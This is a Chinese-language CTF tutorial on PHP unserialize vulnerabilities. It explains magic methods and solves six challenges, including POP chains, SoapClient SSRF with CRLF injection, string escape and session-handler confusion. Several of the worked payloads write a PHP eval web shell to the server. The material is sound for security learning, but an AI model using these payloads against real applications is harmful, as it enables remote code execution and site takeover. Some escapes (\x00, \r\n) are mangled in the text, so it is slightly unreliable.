0×00：前言

各种CTF比赛随处可见反序列化的影子，让我们来了解一下！

阅读本文，需要了解php中类的基础知识

0×01：正文

了解反序列化，必先了解其魔法函数

 1. __sleep() //在对象被序列化之前运行
 2. __wakeup() //将在反序列化之后立即调用（当反序列化时变量个数与实际不符是会绕过）
 3. __construct() //当对象被创建时，会触发进行初始化
 4. __destruct() //对象被销毁时触发
 5. __toString()：//当一个对象被当作字符串使用时触发
 6. __call() //在对象上下文中调用不可访问的方法时触发
 7. __callStatic() //在静态上下文中调用不可访问的方法时触发
 8. __get() //获得一个类的成员变量时调用,用于从不可访问的属性读取数据
 9. __set() //用于将数据写入不可访问的属性
 10. __isset() //在不可访问的属性上调用isset()或empty()触发
 11. __unset() //在不可访问的属性上使用unset()时触发
 12. __toString() //把类当作字符串使用时触发
 13. __invoke() //当脚本尝试将对象调用为函数时触发

然后了解其属性

序列化对象：
private变量会被序列化为：x00类名x00变量名
protected变量会被序列化为: x00*x00变量名
public变量会被序列化为：变量名

让我们跟随CTF题目，来感受反序列化独有的的"魅力"

01

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
  public $username='xxxxxx';
  public $password='xxxxxx';
  public $isVip=false;
  public function checkVip(){
    return $this->isVip;
 }
  public function login($u,$p){
return $this->username===$u&&$this->password===$p;
 }
  public function vipOneKeyGetFlag(){
    if($this->isVip){
      global $flag;
      echo "your flag is ".$flag;
   }else{
      echo "no vip, no flag";
   }
 }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
  $user = unserialize($_COOKIE['user']);  
  if($user->login($username,$password)){
    if($user->checkVip()){
      $user->vipOneKeyGetFlag();
   }
 }else{
    echo "no vip,no flag";
 }
}

通读代码

$username&&$password存在进入反序列化 $_COOKIE['user']

(cookie为可控字段)

随后便调用了login方法

 public function login($u,$p){
         return $this->username===$u&&$this->password===$p;

只有类中$username和$password等于我们传入的值 ，即可返回true

进入第二个if 调用了checkVip方法

 public function checkVip(){
         return $this->isVip;
      }

这里定义类中isVip属性为true即可

便调用了其vipOneKeyGetFlag方法 echo除了flag

思路来了，构造payload

 <?
 class ctfShowUser{
        public $isVip=true;
        public $username='a';
        public $password='a';
 }
 $o=new ctfShowUser();
 echo serialize($o);
 ?>

?username=a&passowrd=a

cookie便传值我们构造出的payload

02

class ctfShowUser{
  private $username='xxxxxx';
  private $password='xxxxxx';
  private $isVip=false;
  private $class = 'info';
  public function __construct(){
    $this->class=new info();
 }
  public function login($u,$p){
    return $this->username===$u&&$this->password===$p;
 }
  public function __destruct(){
    $this->class->getInfo();
 }
}
class info{
  private $user='xxxxxx';
  public function getInfo(){
    return $this->user;
 }
}
class backDoor{
  private $code;
  public function getInfo(){
    eval($this->code);
 }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
  $user = unserialize($_COOKIE['user']);
  $user->login($username,$password);
}

看到这么长的代码，我们可以简化一下

众所周知反序列化找的就是魔法函数

class ctfShowUser{
  private $username='xxxxxx';
  private $password='xxxxxx';
  private $isVip=false;
  private $class = 'info';
  public function __destruct(){
    $this->class->getInfo();
 }
}
class backDoor{
  private $code;
  public function getInfo(){
    eval($this->code);
 }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
  $user = unserialize($_COOKIE['user']);
  $user->login($username,$password);
}

思路

$username和$password存在进入反序列化

backDoor类里边有eval危险函数，我们要将其利用

看到__destruct函数，当类反序列化结束销毁时会将其调用

   public function __destruct(){
         $this->class->getInfo();
      }

看到里边正好有getInfo()函数

我们只需要将$this->class=new backDoor()就可以调用backDoor类中的getInfo()函数 进行eval利用

故构造payload

<?
class ctfShowUser{
  private $class;
  public function __construct(){
    $this->class=new backDoor();
 }
}
class backDoor{
  private $code;
  public function __construct(){
  $this->code='file_put_contents("./shell.php","<?php @eval($_POST[1]);?
>");echo "[++++++++++++++++++++YES+++++++++++++++++++++++]";';
 }
}
$o=new ctfShowUser();
echo urlencode(serialize($o));
?>

?username=xxx&password=xxx

cookie:user=传我们构造的payload即可写入一句话木马

03 原生类利用

<?php
highlight_file(__FILE__);
$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();
////////////////////////////////////////////
//flag.php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);
if($ip!=='127.0.0.1'){
die('error');
}else{
$token = $_POST['token'];
if($token=='ctfshow'){
file_put_contents('flag.txt',$flag);
}
}

访问flag.php需要

X_FORWARDED_FOR===127.0.0.1,127.0.0.1

由于用了CF代理不能构造X_FORWARDED_FOR

故只能用SoapClient原生类来进行SSRF请求

那什么叫SoapClient类呢？

SoapClient采用了HTTP作为底层通讯协议，XML作为数据传送的格式，其采用了SOAP协议(SOAP 是一种简单的基于XML的协议，它使应用程序通过HTTP来交换信息)来触发__call方法，再利用一个CRLF注入进行post传输构造SSRF请求

那什么叫CRLF注入呢？

贴上大佬链接CRLF

故构造payload

 <?php
 $payload= array(
            'user_agent' => "Flowers_BeiChengrnx-forwarded-
 for:127.0.0.1,127.0.0.1rnContent-type:Application/x-www-form-
 urlencodedrnContent-length:13rnrntoken=ctfshow",
            'uri' => 'Flowers_BeiCheng',
            'location' => 'http://127.0.0.1/flag.php'
         )
 $a = new SoapClient(null,$payload);
 $o = serialize($a);
 echo urlencode($o);

04

class ctfshowvip{
  public $username;
  public $password;
  public $code;
public function __wakeup(){
  if($this->username!='' || $this->password!=''){
    die('error');
 }
}
public function __invoke(){
  eval($this->code);
}
public function __sleep(){
  $this->username='';
  $this->password='';
}
public function __unserialize($data){
  $this->username=$data['username'];
  $this->password=$data['password'];
  $this->code = $this->username.$this->password;
}
public function __destruct(){
  if($this->code==0x36d){
    file_put_contents($this->username, $this->password);
 }
}
}
unserialize($_GET['vip']);

__unserialize和__wake同时存在，则__unserialize生效 __wake失效

通读代码

直接利用__destruct中file_put_contents

但想要利用file_put_contents需要$this->code==0x36d(这里考察弱类型比较)

$this->code和0x36d会转换为数字进行比较 0x36d==877

故构造payload

<?php
class ctfshowvip{
  public $username;
  public $password;
  public function __construct(){
    $this->username='877.php';
    $this->password='<?php @eval($_POST[1]);?>';
 }
}
$o = new ctfshowvip();
echo urlencode(serialize($o));
?>

05 字符串逃逸

error_reporting(0);
class message{
  public $from;
  public $msg;
  public $to;
  public $token='user';
  public function __construct($f,$m,$t){
    $this->from = $f;
    $this->msg = $m;
    $this->to = $t;
 }
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){
  $msg = new message($f,$m,$t);
  $umsg = str_replace('fuck', 'loveU', serialize($msg));
  setcookie('msg',base64_encode($umsg));
  echo 'Your message has been sent';
}
highlight_file(__FILE__);

根据提示还有个message.php

highlight_file(__FILE__);
include('flag.php');
class message{
  public $from;
  public $msg;
  public $to;
  public $token='user';
  public function __construct($f,$m,$t){
    $this->from = $f;
    $this->msg = $m;
 $this->to = $t;
 }
}
if(isset($_COOKIE['msg'])){
  $msg = unserialize(base64_decode($_COOKIE['msg']));
  if($msg->token=='admin'){
    echo $flag;
 }
}

触发点在message.php

我们要让$msg->token=='admin',

class message{
  public $from;
  public $msg;
  public $to;
  public $token='user';
  public function __construct($f,$m,$t){
    $this->from = $f;
    $this->msg = $m;
    $this->to = $t;
 }
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

可以看到控制不了$token 可以控制$from $msg $to

传一个正常反序列化内容

O:7:"message":4:
 {s:4:"from";s:1:"1";s:3:"msg";s:1:"1";s:2:"to";s:1:"1";s:5:"token";s:4:"user";}

我们需要构造这样的反序列化内容

 O:7:"message":4:
 {s:4:"from";s:1:"1";s:3:"msg";s:1:"1";s:2:"to";s:1:"1";s:5:"token";s:5:"admin";}

这时候就要传入

 ";s:5:"token";s:5:"admin";} //27个字符

传入的内容需要逃逸出来

 if(isset($f) && isset($m) && isset($t)){
     $msg = new message($f,$m,$t);
     $umsg = str_replace('fuck', 'loveU', serialize($msg));
     setcookie('msg',base64_encode($umsg));
     echo 'Your message has been sent';
 }

fuck变成loveU 四个字符变成五个字符

每次变多一个，一共需要27个字符

构造payload

f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfu
 ckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

06 session反序列化

反序列化处理器

| 处理器           | 对应的存储格式                    
   |
| ------------------------- | :-------------------------------------------------
---------- |
| php            | 键名+竖线+经过serialize()函数反序列化处理的值     
   |
| php_binary         | 键名的长度对应的ASCII字符+键名+经过serialize()函数反序列
化处理的值 |
| php_serialize(php>=5.5.4) | 经过serialize()函数反序列化处理的数组         
   |
#### 安全问题
如果PHP在反序列化存储的$_SESSION数据时的使用的处理器和序列化时使用的处理器不同，会导致数据无法
正确反序列化，通过特殊的构造，甚至可以伪造任意数据
session.auto_start=On
当配置选项session.auto_start=On,会自动注册Session会话，因为该过程是发生在脚本代码执行前，所
以在脚本中设定的包括序列化处理器在内的session相关配选项的设置是不起作用的，因此一些需要在脚本中
设置序列化处理器配置的程序会在session.auto_start=On时，销毁自动生成的Session会话，然后设置
需要的序列化处理器，在调用session_start()函数注册会话，这时如果脚本中设置的序列化处理器与
php.ini中设置的不同，就会出现安全问题

访问/www.zip下载源码

通读代码

index.php

17行，$_SESSION['limit']首先是为空 通过后面的$_COOKIE['limit']便可以控制$_SESSION['limit']

如果无法控制，利用
PHP_SESSION_UPLOAD_PROGRESS来控制session内容

查看check.php

发现包含了inc/inc.php

跟进inc/inc.php

默认配置为php进行反序列化的

那php反序列化什么样的呢？

键名+竖线+经过serialize()函数反序列化处理的值

只有 | 后面的内容才会被反序列化

漏洞关键位置

发现了User类里的__destruct()魔法函数可以进行file_put_contents函数进行getshell

思路

• 前提：由于php.ini默认配置为php_serialize
• 利用index.php控制SESSION文件写入SESSION为序列化后的内容
• 再利用check.php触发反序列化(触发|后面序列化后的内容)

故构造payload

 class User{
     public $username;
     public $password;
     function __construct($username,$password){
         $this->username = $username;
         $this->password = $password;
 }
 }
 $o=new User('huahua.php','<?php @eval($_POST[1]);phpinfo();?>');
 echo base64_encode('|'.serialize($o));

访问index.php改cookie limit为payload 再次访问写入

访问check.php触发

最后访问log-huahua.php

成功写入

0×02：总结

介绍了这么多，相信大家已经对反序列化有了初步的了解

要学会尝试构造POP链复现TP Yii等框架的链子哦